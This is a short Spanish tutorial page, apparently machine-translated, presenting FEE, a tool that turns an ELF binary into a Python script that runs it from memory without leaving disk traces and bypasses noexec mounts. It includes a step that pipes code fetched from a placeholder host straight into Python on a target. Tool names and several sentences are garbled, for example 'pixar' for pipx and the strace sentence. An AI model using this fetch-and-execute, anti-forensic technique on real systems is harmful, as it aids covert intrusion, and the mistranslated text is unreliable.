Tutoriales

Ejecución ELF sin archivos: utilice FEE para ejecutar archivos binarios en la memoria

Este script de Python genera código interpretado que crea el ELF proporcionado como un archivo en la memoria y lo ejecuta (sin tmpfs).

Esto hace posible ejecutar archivos binarios sin dejar rastros en el disco.

Se explican las técnicas utilizadas para este fin. aquí.

Usando las opciones predeterminadas de cada intérprete, ejecute el binario usando fee No escribe en el disco. Esto se puede hacer usando algo como strace.

fee También completamente ignorado y omitido. noexec indicadores de instalación incluso si están configurados para /proc.

Requisitos de objetivo

Instalar

Instálelo en su host usando el siguiente comando pixar:

$ pipx install fee

…o puntos regulares:

$ pip install --user fee

También puedes clonar este repositorio y ejecutar el script directamente.

uso

Uso básico: proporcione la ruta al archivo binario que desea eliminar:

$ fee /path/to/binary > output.py

Luego puedes canalizar esto a Python en el objetivo:

$ curl my.example.site/output.py | python

Para obtener más información, haga clic aquí.

Publicaciones tamiles

Los tamiles están muy interesados ​​en las áreas de ciberseguridad, proyectos OSINT y CTF. Actualmente, está investigando y publicando profundamente varias herramientas de seguridad, incluidos los tutoriales de Kali Linux, que son bastante fascinantes. Ver más publicaciones

Publicaciones relacionadas

Deja una respuesta

Tu dirección de correo electrónico no será publicada. Los campos obligatorios están marcados con *

Botón volver arriba